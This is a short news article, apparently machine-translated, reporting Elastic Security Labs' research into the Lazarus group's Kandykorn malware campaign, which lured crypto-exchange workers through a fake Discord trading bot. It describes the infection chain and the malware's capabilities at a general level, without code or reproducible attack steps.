Through research Elastic Security Labs it was possible to identify a new malware campaign involving the group’s notorious cybercriminals Lazarus.
The malicious agent, called Kandykorntargets the cryptocurrencies. According to data collected by experts, North Korean hackers have targeted people working in the context of crypto exchanges through Discord.
Here, they lured potential victims through an alleged bot capable of facilitating profitable trading operations. The downloaded bot turns out to be a ZIP archivewith a file to execute named Main.py. This in turn presents a malicious file named Watcher.py.
The aforementioned file therefore connects with an account Google Drivedownloading other malicious files, including additional software called Sugarloader which, although not malware, represents a danger to victims.
It is, in fact, a system capable of bypassing the anti-malware checks and facilitate the subsequent download of the actual malware.
Kandykorn offers cybercriminals plenty of leeway
With Sugarloader allowing you to download Kandykorn, the actual infection starts.
The malware contains numerous functions that can be used by the remote server to perform various malicious activities. For example, the command “0xD3” can be used to get a list of the contents of a folder on the victim’s computer. The command “resp_file_down“, however, can be used to transfer any of the victim’s files to the attacker’s computer.
Elastic believes the attack began in April 2023. It says the system is likely still being used to carry out attacks today, stating “This threat is still active and the tools and techniques are continuously updated“.
The centralized cryptocurrency exchanges eh wallet have suffered a wave of attacks in 2023. Among the platforms, despite themselves, involved in these campaigns are well-known names in the sector such as Alphapo, CoinsPaid, Atomic Wallet, Coinex, Stake and many others.